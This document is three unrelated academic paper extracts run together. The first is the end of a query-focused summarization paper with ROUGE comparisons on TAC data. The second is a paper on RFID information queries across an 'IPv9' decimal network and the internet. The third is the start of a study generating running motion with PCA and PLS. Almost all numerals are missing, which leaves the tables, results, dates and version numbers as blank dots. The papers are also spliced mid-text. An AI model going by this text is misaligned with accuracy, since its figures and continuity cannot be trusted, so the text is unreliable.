sentence selection strategy. kl(ps||qd) = ∑ w p(w)log p(w) q(w) ( ) where ps is the unigram distribution of candidate summary and qd denotes the unigram distribution of document collection. sentences with higher ranking score is selected into the summary. hiersum: a lda based approach proposed by haghighi and vanderwende ( ), where unigram distribution is calculated from lda topic model in equ.( ). hybhsum: a supervised approach developed by celikyilmaz and hakkani-tur ( ). for fair comparison, baselines use the same pro- precessing methods with our model and all sum- here, we only use the docset-a data in tac, since tac data is composed of docset-a and docset-b data, and the docset- b data is mainly for the update summarization task. http://tartarus.org/ martin/porterstemmer/. jackknife scoring for rouge is used in order to compare with the human summaries. maries are truncated to the same length of words. from table and table , we can methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) hybhsum . . . ( . - . ) ( . - . ) ( . - . ) hiersum . . . ( . - . ) ( . - . ) ( . - . ) klsum . . . ( . - . ) ( . - . ) ( . - . ) standlda . . . ( . - . ) ( . - . ) ( . - . ) table : comparison of bayesian models on tac methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) hybhsum . . . ( . - . ) ( . - . ) ( . - . ) hiersum . . . ( . - . ) ( . - . ) ( . - . ) klsum . . . ( . - . ) ( . - . ) ( . - . ) standlda . . . ( . - . ) ( . - . ) ( . - . ) table : comparison of bayesian models on tac see that among all the bayesian baselines, hybh- sum achieves the best result. this further illus- trates the advantages of combining topic model with supervised method. in table , we can see that our s-slda model performs better than hybhsum and the improvements are . % and . % with re- spect to rouge- and rouge-su on tac data. the comparison can be extended to tac data as shown in table : the performance of s- slda is above hybhsum by . % in rouge- and . % in rouge-su . it is worth explaining that these achievements are significant, because in the tac evaluation, the performance of the top ranking systems are very close, i.e. the best system is only . % above the th best system on rouge- and . % on rouge-su . . comparison with other baselines. in this subsection, we compare our model with some widely used models in summarization. manifold: it is the one-layer graph based semi- supervised summarization approach developed by wan et al.( ). the graph is constructed only con- sidering sentence relations using tf-idf and neglects topic information. lexrank: graph based summarization approach (erkan and radev, ), which is a revised version of famous web ranking algorithm pagerank. it is an unsupervised ranking algorithms compared with manifold. svm: a supervised method - support vector ma- chine (svm) (vapnik ) which uses the same features as our approach. mead: a centroid based summary algorithm by radev et al. ( ). cluster centroids in mead consists of words which are central not only to one article in a cluster, but to all the articles. similarity is measure using tf-idf. at the same time, we also present the top three participating systems with regard to rouge- on tac and tac for comparison, denoted as (denoted as sysrank st, nd and rd)(gillick et al., ; zhang et al., ; gillick et al., ; varma et al., ). the rouge scores of the top tac system are directly provided by the tac evaluation. from table and table , we can see that our approach outperforms the baselines in terms of rouge metrics consistently. when compared with the standard supervised method svm, the relative improvements over the rouge- , rouge- and rouge-su scores are . %, . %, . % respec- tively on tac and . %, . %, . % on tac . our model is not as good as top par- ticipating systems on tac and tac . but considering the fact that our model neither uses sen- tence compression algorithm nor leverage domain knowledge bases like wikipedia or training data, such small difference in rouge scores is reason- able. . manual evaluations in order to obtain a more accurate measure of sum- mary quality for our s-slda model and hybhsum, we performed a simple user study concerning the following aspects: ( ) overall quality: which sum- mary is better overall? ( ) focus: which summary contains less irrelevant content? ( )responsiveness: which summary is more responsive to the query. ( ) non-redundancy: which summary is less re- dundant? judges who specialize in nlp partic- ipated in the blind evaluation task. evaluators are presented with two summaries generated by s-slda methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) sysrank st . . . ( . - . ) ( . - . ) ( . - . ) sysrank nd . . . ( . - . ( . - . ) ( . - . ) sysrank rd . . . ( . - . ) ( . - . ) ( . - . ) pagerank . . . ( . - . ) ( . - . ) ( . - . ) manifold . . . ( . - . ) ( . - . ) ( . - . ) svm . . . ( . - . ) ( . - . ) ( . - . ) mead . . . ( . - . ) ( . - . ) ( . - . ) table : comparison with baselines on tac methods rouge- rouge- rouge-su our . . . approach ( . - . ) ( . - . ) ( . - . ) sysrank st . . . ( . - . ) ( . - . ) ( . - . ) sysrank nd . . . ( . - . ) ( . - . ) ( . - . ) sysrank rd . . . ( . - . ) ( . - . ) ( . - . ) pagerank . . . ( . - . ) ( . - . ) ( . - . ) manifold . . . ( . - . ) ( . - . ) ( . - . ) svm . . . ( . - . ) ( . - . ) ( . - . ) mead . . . ( . - . ) ( . - . ) ( . - . ) table : comparison with baselines on tac and hybhsum, as well as the four questions above. then they need to answer which summary is better (tie). we randomly select document collections from tac data and randomly assign two sum- maries for each collection to three different evalua- tors to judge which model is better in each aspect. as we can see from table , the two models al- most tie with respect to non-redundancy, mainly because both models have used appropriate mmr strategies. but as for overall quality, focus and our(win) hybhsum(win) tie overall focus responsiveness non-redundancy table : comparison with baselines on tac responsiveness, s-slda model outputs hybhsum based on t-test on % confidence level. ta- ble shows the example summaries generated re- spectively by two models for document collection d a-a in tac , whose query is “describe the coal mine accidents in china and actions taken“. from table , we can see that each sentence in these two summaries is somewhat related to topics of coal mines in china. we also observe that the summary in table (a) is better than that in table (b), tend- ing to select shorter sentences and provide more in- formation. this is because, in s-slda model, topic modeling is determined simultaneously by various features including terms and other ones such as sen- tence length, sentence position and so on, which can contribute to summary quality. as we can see, in table (b), sentences ( ) and ( ) provide some unimportant information such as “somebody said“, though they contain some words which are related to topics about coal mines. ( )china to close at least , coal mines this year: official ( )by oct. this year there had been coal mine accidents that killed or more people, ( )offi- cials had stakes in coal mines. ( )all the coal mines will be closed down this year. ( ) in the first eight months, the death toll of coal mine accidents rose . percent last year. ( ) the government has issued a series of regulations and measures to improve the coun.try’s coal mine safety situation. ( )the mining safety technology and equipments have been sold to countries. ( )more than , miners died in accidents in china ( ) in the first eight months, the death toll of coal mine accidents across china rose . percent from the same period last year. ( )china will close down a number of ill-operated coal mines at the end of this month, said a work safety official here monday. ( ) li yizhong, director of the national bureau of production safety supervision and administration, has said the collusion between mine owners and officials is to be condemned. ( )from january to september this year, , people were killed in , coal mine accidents. ( ) chen said officials who refused to register their stakes in coal mines within the required time table : example summary text generated by systems (a)s-slda and (b) hybhsum. (d a-a, tac ) conclusion in this paper, we propose a novel supervised ap- proach based on revised supervised topic model for query-focused multi document summarization. our approach naturally combines bayesian topic model with supervised method and enjoy the advantages of both models. experiments on benchmark demon- strate good performance of our model. acknowledgments this research work has been supported by nsfc grants (no. and no. ), national key technology r&d program (no: bah b ), and national high tech- nology r&d program (no. aa ). we also thank the three anonymous reviewers for their helpful comments. corresponding author: sujian li. references david blei and jon mcauliffe. supervised topic models. . in neural information processing systems david blei, andrew ng and micheal jordan. latent dirichlet allocation. in the journal of machine learn- ing research, page: - . charles broyden. . a class of methods for solv- ing nonlinear simultaneous equations. in math. comp. volume , page - . jaime carbonell and jade goldstein. . the use of mmr, diversity-based reranking for reordering doc- uments and producing summaries. in proceedings of the st annual international acm sigir conference on research and development in information retrieval. asli celikyilmaz and dilek hakkani-tur. . a hy- brid hierarchical model for multi-document summa- rization. in proceedings of the th annual meeting of the association for computational linguistics. page: - jade goldstein, mark kantrowitz, vibhu mittal and jaime carbonell. . summarizing text docu- ments: sentence selection and evaluation metrics. in proceedings of the nd annual international acm si- gir conference on research and development in infor- mation retrieval, page: - . amit grubber, micheal rosen-zvi and yair weiss. . hidden topic markov model. in artificial intelligence and statistics. hal daume and daniel marcu h. . bayesian query- focused summarization. in proceedings of the st international conference on computational linguis- tics and the th annual meeting of the association for computational linguistics, page - . gune erkan and dragomir radev. . lexrank: graph- based lexical centrality as salience in text summariza- tion. in j. artif. intell. res. (jair), page - . dan gillick, benoit favre, dilek hakkani-tur, the icsi summarization system at tac, tac . dan gillick, benoit favre, and dilek hakkani-tur, berndt bohnet, yang liu, shasha xie. the icsi/utd summarization system at tac . tac aria haghighi and lucy vanderwende. . exploring content models for multi-document summarization. in proceedings of human language technologies: the annual conference of the north american chap- ter of the association for computational linguistics, pages . feng jin, minlie huang, and xiaoyan zhu. . the summarization systems at tac . in proceedings of the third text analysis conference, tac- . liangda li, ke zhou, gui-rong xue, hongyuan zha and yong yu. . enhancing diversity, coverage and bal- ance for summarization through structure learning. in proceedings of the th international conference on world wide web, page - . chin-yew lin, guihong gao, jianfeng gao and jian-yun nie. . an information-theoretic approach to au- tomatic evaluation of summaries. in proceedings of the main conference on human language technology conference of the north american chapter of the as- sociation of computational linguistics, page: - . annie louis, aravind joshi, ani nenkova. . dis- course indicators for content selection in summariza- tion. in proceedings of the th annual meeting of the special interest group on discourse and dialogue, page: - . tengfei ma, xiaojun wan. . multi-document sum- marization using minimum distortion, in proceedings of international conference of data mining. page . rebecca mason and eugene charniak. . extractive multi-document summaries should explicitly not con- tain document-specific content. in proceedings of acl hlt, page: - . ani nenkova and lucy vanderwende. the impact of fre- quency on summarization. in tech. report msr-tr- - , microsoft research, redwood, washing- ton, . ani nenkova, lucy vanderwende and kathleen mcke- own. . a compositional context sensitive multi- document summarizer: exploring the factors that inu- ence summarization. in proceedings of the th an- nual international acm sigir conference on re- search and development in information retrieval, page - . miles osborne. . using maximum entropy for sen- tence extraction. in proceedings of the acl- work- shop on automatic summarization, volume page: - . jahna otterbacher, gunes erkan and dragomir radev. . using random walks for question-focused sen- tence retrieval. in proceedings of the conference on human language technology and empirical methods in natural language processing, page - you ouyang, wenjie li, sujian li and qin lua. . applying regression models to query-focused multi- document summarization. in information processing and management, page - . you ouyang, sujian. li, and wenjie. li. , develop- ing learning strategies for topic-based summarization. in proceedings of the sixteenth acm conference on conference on information and knowledge manage- ment, page: . daniel ramage, david hall, ramesh nallapati and christopher manning. . labeled lda: a super- vised topic model for credit attribution in multi-labeled corpora. in proceedings of the conference on empirical methods in natural language processing, vol , page - . dou she, jian-tao sun, hua li, qiang yang and zheng chen. . document summarization using conditional random elds. in proceedings of inter- national joint conference on artificial intelligence, page: . v. varma, v. bharat, s. kovelamudi, p. bysani, s. gsk, k. kumar n, k. reddy, n. maganti , iiit hyderabad at tac . tac xiaojun wan and jianwu yang. . multi-document summarization using cluster-based link analysis. in proceedings of the st annual international acm si- gir conference on research and development in in- formation retrieval, page: - . xiaojun wan, jianwu yang and jianguo xiao. . manifold-ranking based topic-focused multi- document summarization. in proceedings of in- ternational joint conference on artificial intelligence, page - . furu wei, wenjie li, qin lu and yanxiang he. . ex- ploiting query-sensitive similarity for graph-based query-oriented summarization. in proceedings of the st annual international acm sigir conference on research and development in information retrieval, page - . jin zhang, xueqi cheng, hongbo xu, xiaolei wang, yil- ing zeng. ictcas’s ictgrasper at tac : sum- marizing dynamic information with signature terms based content filtering, tac . dengzhong zhou, jason weston, arthur gretton, olivier bousquet and bernhard schlkopf. . ranking on data manifolds. in proceedings of the conference on advances in neural information processing systems, page - . jun zhu and eric xing. . conditional topic random fields. in proceedings of the th international con- ference on machine learning. xiaojin zhu, zoubin ghahramani and john laf- ferty. . semi-supervised learning using gaussian fields and harmonic functions. in proceedings of in- ternational conference of machine learning, page: - . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - on the rfid information query technology based on ipv li guiping the school of computer science and engineering xi’an technological university, xi’an, china e-mail: @qq.com xue lei shandong university of science and technology daizong street, tai’an city shandong province, e-mail: shirleyxue @ .com abstract—since coding format of rf label is inconsistent with the protocol format of the information server's network, a design scheme of network architecture is proposed to achieve the connectivity between the decimal network based on ipv and the internet network based on ipv /ipv . and also, two ways of information’s query and connectivity based on d-ons and direct routing between the decimal network is devised by using the expert modules. the experiment results shows that both the two ways can provide efficient service of rfid information query . keywords-ipv ; rfid; domain transformation; information query i. introduction with the development of radio frequency technology, product-related information can be quickly obtained by the readers if rf tags are assigned to each product. recently, people have began to adopt ipv and even ipv protocol formats for rf tag coding since ipv address space has been used up. if the server storing product-related information is stored in an ipv or ipv network, how to query rf information across the network should be solved. this paper mainly studies the rf information query process of interconnection between decimal network and internet network and the domain name conversion rules obtained by decimal network query server. ii. ipv ipv , short for decimal network and the new generation of internet, is the result of china's independent innovation of core technologies which has ipv protocol, ipv addressing, digital domain name system and other core technologies are adopted with original and independent intellectual property rights. full digital text is used to represent the ip address. the address space is larger than that of ipv or ipv . the st- th level of the address space is expressed as binary bits, while using the decimal bits to express the th. iii. rfid radio frequency identification(rfid) is a non- contact automatic recognition technology. it communicates with other object using reflected power. it can automatically identify target objects and obtain relevant data through radio frequency signals, which can quickly track items and exchange data. and also, the identify ability need no one to participate in. a typical rfid system consists of electronic tag, reader (including antenna) and application system. further, electronic tags are the data carrier of rfid system which consists of a label antenna and a label chip. it can receive the reader's electromagnetic field modulation signal and return the response signal to achieve the label identification code and memory data read or write operations. the reader is used to receive host commands and send the data stored in the sensor back to the host by the wired or wireless way. it contains a controller and an antenna. if the reading distance is long, the antenna will stand alone. the terminal computer of the application system interacting with the rfid system transmits the work instructions issued by the mis application system. it makes electronic tags and readers be coordination through middleware, processes all data collected by rfid system, and carries out calculation, storage and data transmission. the process can be described as fig. and fig. . figure . the requery process of information based on rfid timin g data energy rfid antenna rfid electronic label computer control network rfid reader and writer international journal of advanced network, monitoring and controls volume , no. , figure . electronic tags the operating principle of rfid system is to receive the radio frequency signal emitted by the reader when an item with an electronic tag enters the radiation range of the reader antenna. the passive tag sends data stored in the tag chip using the energy generated by the induced current, while active electronic tags can send data stored in the tag chip, actively. generally, readers are equipped with middleware of certain functions. hence, it can read data, decode and directly carry out simple data processing, then send to the application system. the application system judges the legitimacy of electronic tags according to the logic operation, and carries out corresponding processing and control for different settings, thus realizing the basic functions of rfid system. iv. network architecture based on ipv rfid information query technology rfid information query technology can provide people with the function of inquiring information related to products through the rfid tag. the information related to rfid tags is stored on the information server and is generally maintained by the manufacturer of the product. in view of the actual use of the internet, it is necessary to design a network architecture for interconnection between the decimal network and the internet, which meets certain conditions. on this basis, rfid tag information query service is implemented. the overall network architecture design scheme is as follows. a. overall design of network architecture the architecture of rfid tag information query service on internet is based on ipv and ipv protocols. routing adopts ipv and ipv protocols, and resource positioning is completed by sns and psns. the architecture of electronic tag information location query service based on decimal network is a network architecture based on ipv protocol, including the following two ways. ( ) using the routing to locate the information server directly. the route uses the ipv protocol without the dns resolver. ( ) adopting the parsing service of the application layer with u-code resolution server. dons uses host domain name resolution to provide ipv , ipv and ipv addresses, while using ipv , ipv and ipv protocols as routing protocols .resource positioning is done by d-ons. the network architecture of rfid tag information query service mainly includes the decimal network information query service technology system and the internet information query service technology system. specifically, the decimal network architecture includes middleware, information server, d-ons server, ddns and ipv direct router. internet architecture includes sns server, psns server, information server, .cn root dns server, ddns server and.cn root. dns server through the domain name resolution forwarding digital domain name and english domain name connectivity. b. the key module of network architecture -- expert module the expert module is the middleware used between the decimal network and the internet to realize the interconnection between the two, and the data exchange format between the two is xml. it includes the following interfaces.  rf information query of decimal network and architecture of discovery technology input product and service digital identifiers to query the internet rf information, through the expert module, discovery technology architecture request to return the product and service specific information storage address or uri.  rf information query of internet and architecture of discovery technology input product and service digital identifiers to query the decimal network rf information, through the expert module, discovery technology architecture request to return the product and service specific information storage address or uri.  rf information query of decimal network and architecture of discovery technology input product and service digital identifiers to query the internet rf information, through the expert module, discovery technology architecture request to return the product and service specific information. international journal of advanced network, monitoring and controls volume , no. ,  rf information query of internet and architecture of discovery technology input product and service digital identifiers to query the decimal network rf information, through the expert module, discovery technology architecture request to return the product and service specific information. v. research on information query process based on the above network architecture, the implementation of rfid tag information query service based on ipv can be designed in two ways: d-ons based decimal network and internet network information query and direct routing mode of exchange visits between decimal network information query service system and internet information query service system. a. exchange query process between d-ons-based decimal network and internet network information query service system when the related product information is stored in the internet information server and label coding format is using able format, the decimal network based on d- ons accessing the information query process of internet mainly involves the following several key modules: decimal network query server, decimal network, expert module, information server middleware, the sns and psns server. the access relationship between these modules is shown in figure . decimal network label readers require server expert modul middleware sns server psns server information server a) b) c) d) i) e) j) f) g) h) identifiers of product and service domain of product and server standard identifiers and identifiers of product and service domain of product and server naptr resource record address of information server conneccti on internet identifiers of product and service figure . the process of accessing the internet on a d-ons- based decimal network. ) the access process can be described as follows a) using rfid readers to read ipv identifiers and product and service identifiers from electronic tags. b) submitting the read identifiers and product and service identifiers to the query server in the decimal network. c) calling decimal network query server and internet interface expert modules to access the internet. d) the internet interface of the expert module accesses the middleware of the internet architecture through standard identifiers and identifiers of product and service . e) the service middleware converts the standard identifier to the domain name format and sends it to the sns server to request the resolution service. f) the sns server returns the conversion rules of psid domain name by the form of regular expressions to the service middleware. g) service middleware issues query request to psns server based on psid domain name. international journal of advanced network, monitoring and controls volume , no. , h) psns returns the naptr record containing the product and service information service or psds address. i) the service middleware returns the results to the expert module, whose decimal network interface returns service of the product and information or naptr records of psds address to the query server. j) querying the server request and finally getting the product information returned by the information server. when product-related information is stored in the information server of the decimal network, and the label encoding format is ipv or ipv format, the d- ons based decimal network needs to be accessed through the internet network. the access process involves the key modules: internet query server, expert module, d-ons server, information server. the access process is shown in figure . decimal network d-ons resolve server d-ons server information server domain resolve server expert modul label reader requery server a) b) c) f) d) e) g) tandard id code and domain name onversion network distributed query control product and service domain name address of information server identifiers of product and service. identifiers of product and service. internet figure . the process of internet accessing to a decimal network based on the d-ons protocol. ) the access process can be described as follows a) using rf readers to read product and service identifiers from electronic tags encoded in ipv and ipv formats. b) submitting the identifier and identifiers of product and service to the query server. c) calling by the query server the expert module's decimal network interface between the internet network and the decimal network. d) the decimal network interface of the expert module sends a request to the d-ons server of the decimal network architecture to inquire the information of the server domain name where the product information is stored through the identifier and product and service. e) the d-ons server receives the request and returns information of the product and service domain name. f) the information server of decimal network queries the internet server for product information. g) the query server returns product information. b. directly routing the decimal network information query service and the internet information query service system exchange query process the process of mutual visits between the system of decimal network information query service with direct routing and the internet information query service system are shown in figure and figure . it involve the query server, expert module, middleware, information server, sns server and psns server. international journal of advanced network, monitoring and controls volume , no. , the interconnection of ipv , ipv and ipv can realize the mutual visits between ipv , ipv and ipv through protocol conversion. specifically, a protocol conversion server needs to be set up, and all data packets are converted into specified protocols to satisfy the data communication between different protocols. decimal network label reader requery server internet middleware sns server psns server information server a) b) c) j) d) i) e) k) f) g) h) identifier of product and service identifier of product and service domain of product and server naptr resource record address of information server connection expert modul protocl transerformation ipv ipv / ipv figure . the accessing process of direct routing of decimal network to the internet ) the process of searching the product information stored in the internet and encoding format used ipv can be described as follows. rf reader reads ipv identifier and the identifier of product and service from electronic tag. submitting identifiers of product and service to the query server on a decimal network. a) the query server calls the expert module's internet interface. b) the internet interface of the expert module accesses the middleware of the internet architecture through identifiers of product and service. c) internet middleware delivers product and service domain names to the sns server. d) sns server returns the middle results to the middleware . e) the middleware returns the results to the expert module. f) the expert module requests product information from the information server according to the address information inquired. g) the expert module returns the product information to the query server of decimal network to complete the process of product information query. in the direct routing mode, if the product's rf tags are encoded in ipv and ipv protocols, and the product-related information is stored in the server of the decimal network, the query process needs to involve ipv router, information server, expert module and query server. international journal of advanced network, monitoring and controls volume , no. , decimal network ipv direct routing server information server internet label reader requery server a) b) c) f) e)identifier of product and service transformation ruler of domain of product and server identifier of product and service non-decimal product identifier expert modul protocol transformation h) ipv ipv / ipv figure . the access process from internet to decimal network under the direct routing ) the access process can be described as follows. a) rf readers read ipv or ipv identifiers and identifiers of product and service from electronic tags. b) submitting identifiers of product and service to the query server over the internet network. c) the query server calls the expert module's decimal network interface. d) the expert module of decimal network interface accesses the ipv router for the decimal network architecture through identifiers of product and service . e) the pv router converts the product and service digital identifiers to the ip address of the product information server. f) the ipv router accesses the information server and requests product information. g) the ipv router returns product information to the internet user via the expert module. in the above process, the expert module between the two network systems realizes the translation and conversion of the data formats of the two systems. the protocol conversion module can translate the ip address, message and header. vi. conclusion this paper proposes two kinds of information query exchange services between decimal network and internet to solve the problem that the encoding format of radio frequency tag is not uniform with the network protocol format of product information server. experimental results show that both methods can provide efficient rf information query service. references [ ] sj/t ccccc-cccc digital identity format specification for information processing products and services. [ ] sj/t ddddd-dddd rf-based domain name specification for products and services [ ] ietf rfc domain names-concepts and facilities [ ] ietf rfc domain names-implementation and specification [ ] ietf rfc tcp and udp with bigger addresses [ ] ietf rfc iso use of iso clnp in tuba environments [ ] ietf rfc a historical perspective on the usage of ip version [ ] ietf rfc a view from the st century [ ] ietf rfc - assigned numbers) submitted july accepted november published december corresponding author juan vicente durá-gil, juan.dura@ibv.upv.es academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright baydal-bertomeu et al. distributed under creative commons cc-by . open access a pca-based bio-motion generator to synthesize new patterns of human running josé maría baydal-bertomeu*, juan vicente durá-gil*, ana piérola-orcero*, eduardo parrilla bernabé*, alfredo ballester* and sandra alemany-munt* instituto de biomecánica de valencia, universitat politècnica de valència, valencia, spain * these authors contributed equally to this work. abstract synthesizing human movement is useful for most applications where the use of avatars is required. these movements should be as realistic as possible and thus must take into account anthropometric characteristics (weight, height, etc.), gender, and the performance of the activity being developed. the aim of this study is to develop a new methodology based on the combination of principal component analysis and partial least squares regression model that can generate realistic motion from a set of data (gender, anthropometry and performance). a total of volunteer runners have participated in the study. the joint angles of the main body joints were recorded in an experimental study using d motion tracking technology. a five-step methodology has been employed to develop a model capable of generating a realistic running motion. the described model has been validated for running motion, showing a highly realistic motion which fits properly with the real movements measured. the described methodology could be applied to synthesize any type of motion: walking, going up and down stairs, etc. in future work, we want to integrate the motion in realistic body shapes, generated with a similar methodology and from the same simple original data. subjects data mining and machine learning, graphics, scientific computing and simulation keywords synthesizing motion, motion analysis, pls, running, pca introduction it is well known that there is a large degree of information contained in the kinematics of a moving body which is influenced by parameters such as: gender, age, anthropometrical fea- tures, emotional state, personality traits, etc. (troje, ). a number of studies demonstrate the capability of the human visual system to detect, recognize and interpret the information encoded in the biological motion (johansson, ). there are also many attempts to analyse this information encrypted in human motion. some researchers use discrete kinematics parameters such as ranges, speed, etc. (dvorak et al., ). others focus their studies on the sequence of movement along time instead of recording simple parameters. in these cases, they analyse the complete function of time f (t) (feipel et al., ). a number of kinematical models are based on frequency domain manipulations (davis, bobick & richards, ) and multiresolution filtering (bruderlin & williams, ). how to cite this article baydal-bertomeu et al. ( ), a pca-based bio-motion generator to synthesize new patterns of human run- ning. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:juan.dura@ibv.upv.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. nevertheless, the most common objective of these studies is to model and to classify the movement pattern of the person being measured, rather than creating new motions from the extracted information. in this regard, motion synthesis is currently attracting a great deal of attention within the computer graphics community as a means of animating three dimensional realistic characters and avatars; and in the robotic field to provide controlled real-time dynamic motion for the locomotion and other activities (kajita et al., ). with the computational resources available today, large-scale models of the body (i.e., models that have many degrees of freedom and are actuated by many muscles) may be used to perform realistic simulations (pandy, ). nevertheless, it is necessary to perform lab experiments to track the positions and orientations of body segments executing the task aimed to be synthesized. recording motion data directly from real actors and mapping them to computer characters is a common technique used to generate high quality motion (li, wang & shum, ). however, this technique requires a high effort in experimental work. besides, new measures are needed to include changes in the pattern of movement, such as age, weight, gender or speed. in this sense, it would be useful to create a methodology based on biomechanical models constructed from a database of motions, instead of a single actor, able to generate realistic motions of individuals with different anthropometrical characteristics, with sufficient accuracy and without the need to perform laboratory measurements. several authors have addressed the motion modelling and synthesis for biped walking, jumping, pedalling (troje, ), or even stair-ascending (vasilescu, ). classically the mathematical approach of the synthesis of movement has been the dynamic optimization of biomechanical body structures (pandy, ). these models provide detailed information of the functioning of some structures, such as the description of muscle function during normal gait. however, this approach becomes an unworkable problem when a greater number of body structures are included in the model. a new approach based on principal components analysis (pca) can facilitate the understanding of the information contained in the kinematics of a moving human body and avoids the inclusion of the dynamics in the model. pca can extract depth information contained in the mathematical function and its derivatives not normally available through traditional statistical methods (ullah & finch, ). in this way pca can be used on different levels. for instance, troje ( ) used pca in two steps for the purpose of analysing and synthesizing human gait patterns. in the first one, they extracted the main components from the entire database, in order to eliminate redundancy and to reduce the dimensionality. in the second step, pca was applied particularly for each walker in order to retain the encoded information of each walker-specific variation. in our research, we will also use a model (based on pca) to extract the most relevant information from the pattern of running. this information will be used to develop a bio-motion generator which will solve the opposite problem of synthesizing new realistic movements. in addition, existing literature focused on synthesizing motion does not correlate the generated movement to age, gender, performance parameters such as velocity or anthropometrical features. in this sense our research has three goals. the first one is to generate a database of running movements of a full human model. the second is to baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. extract the signature of each motion, by means of pca technique and to correlate the distinctive styles of each runner with their anthropometrical characteristics, age, gender, and performance parameters such as the velocity of the action. the third is to develop a bio-motion generator based on a statistical model capable of synthesizing new realistic running motion from a set of desired data: age, gender, height, body mass index (bmi) and velocity. nowadays there exists a line of research developed in the field of anthropometry for the purpose of obtaining a model of human body shape from a database of processed raw scans (vinué et al., ). the methodology followed in that line of research provides sufficient resolution to synthesize accurate realistic representations of body shapes from a set of simple anthropometrical parameters. ballester et al. ( ) describe a method based on the harmonization of body scan data followed by a shape analysis procedure using principal component analysis. the combination of these techniques allows the generation of human d shape models from anthropometric measurement data (age, height, weight, bmi, waist girth, hip girth, bust/chest girth, etc.). our hypothesis is that the use of a similarly based methodology to generate human motion instead of human body shapes is possible, valid and reliable. the novelty in our approach is the generation of running data from a set of easily measurable anthropometric parameters and a desired value of running speed. materials and methods data gathering an experimental phase was carried out with the aim of gathering a database of the running movements that we needed to include in the biomechanical model. the data consisted of the d joint angles of the main body joints. the articulated human body model used in our study comprised segments and joints distributed throughout the body. lower limb: hip, knee, ankle and metatarsopha- langeal joint; upper limb: shoulder, elbow and wrist; trunk: pelvis, l , l , t , t and neck. the positions of the joints of the human body model were defined in a recursive mode with respect to the origin joint (father) of the related segment. this methodology is based on the biovision hierarchical data (bvh) format (meredith & maddock, ). each subject was kinematically characterised by means of variables, defined as follows: . vertical (z) position of the root segment, in our case the hips. . tri-dimensional orientation (x, y, z) of the total amount of segments with respect the root. × = variables. study sample eighteen people composed the study sample, with the same number of male and female. theiragesranged from to years (averageage: years). theywere selectedaccordingto some specific parameters, trying to cover a wide range in the anthropometric characteristics of height and body mass index (table ). ethical approval was obtained from the ethics committee of the universitat politècnica valència. all participants gave written informed consent. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table description of the anthropometrical parameters. gender parameter mean std. max. min. age . . weight . . . . height . . . . male bmi . . . . age . . weight . . . . height . . . . female bmi . . . . measurement and protocol the measurements were performed using commercial equipment based on inertial sensors: moven studio. the commercial system has been validated by previous studies (zhang et al., ; thies et al., ). asamplingfrequencyof hzwasused. thissystem showed a very high sensitivity to electromagnetic fields. for this reason, the measurements of running trials were done outdoors in a location free of electromagnetic pollution. experimental procedure for the purpose of controlling the pace of running, a -metre-long corridor, delimited with cones every m was set up. thus, we obtained four areas, one area of acceleration, two of constant speed and a final deceleration area. running at constant speed presents a periodic timing in which the period depends on the velocity (novacheck, ). nevertheless, acceleration and deceleration periods are out of phase and the duration of cycles is variable. therefore, the running cycles used to create our model were selected within the area of constant speed. in the case of running, the pattern of the movement changes with velocity (e.g., stride length, maximum joint angles, etc.). for this reason, each runner completed six running trials at different speeds. initially, subjects started running at normal speed. in the second measurement subjects ran at their maximum speed. the third and fourth trial were performed at a pace between normal and maximum speed. the fifth trial was performed at the minimum speed at which each runner was able to run, on the edge between walking and running. running defined in this case as when there is no phase of bipodal support (biewener et al., ). the last trial was performed at an average speed between the lower and the normal speed. this procedure allowed us to obtain six observations representing the whole range of speeds that each subject could execute. mathematical procedure the methodology used in our study comprised five steps: -reduction of intra-personal variability: joint angles are periodic by nature. we took the most representative single stride for the purpose of reducing variability and dismiss the phases with no consistent speed, such as acceleration and deceleration steps. the selected stride was picked in the middle of the running sequence, guaranteeing constant speed. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure knee angle vs % of the cycle. -time normalization: time normalization is usually employed for the temporal alignment of cyclic data obtained from different trials with different duration. in our approach, the number of samples for each stride depended on the velocity of the running. at this point we normalised the variable ‘‘time’’ applying an interpolation technique based on cubic splines through the measured values of the whole sequence of samples. this technique enables the normalization of all the measurements to the percentage of the running cycle. the cubic spline was applied to normalize at equispaced time intervals per each variable (see the example in fig. ). the application of the cubic spline to the kinematical variables makes a total amount of × ( , ) data per each subject. -data cleaning: at this point a detailed checking and cleaning of inaccuracies of the kinematical data was conducted. these type of inaccuracies were caused mostly by the measurement system. the prevention of errors at this point is preferable to their later correction once the model has been created. all the measurements have been manually analysed thoroughly by an experienced examiner. the identified inaccuracies were treated as follows: (a) angular offsets: this common error usually appears during the standing posture and can affect the later joint angles registers during the trial (running) (mills et al., ). offsets have been corrected manually eliminating (adding or subtracting) the difference between the initial angle observed and the expected angle of the body segment at this position. (b) positioning error: due to the fact that our measurement system, based on inertial sensors, uses the earth’s magnetic field to determine the reference position of each subject, it is quite common to find subjects with slight differences in their initial reference positions. in this case, we have proceeded by correcting the reference system aligning it with the direction of running forward. thus, we can guarantee that all measurements are equally oriented. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (c) non-physiological angles: some errors in the registration of joint angles were detected in the database. these inaccuracies came from errors of the inertial sensors. in this case, it was not possible to correct the error effectively, thus we proceed by eliminating these observations from the database and repeating the measurement. -dimensionality reduction: the database of all measurements was combined in a single matrix w . the initial number of observations is ( subjects× velocities= ). but three measurements fail, therefore w has rows (observations) and , columns ( equispaced time intervals × kinematical variables). motion data of each observation is enclosed in the rows of the matrix w =(wi),i= ,..., . before the creation of the bio-motion generator, by means of a regression model, it was needed to reduce the dimensionality of the motion data. computing a pca on the running data (contained in matrix w 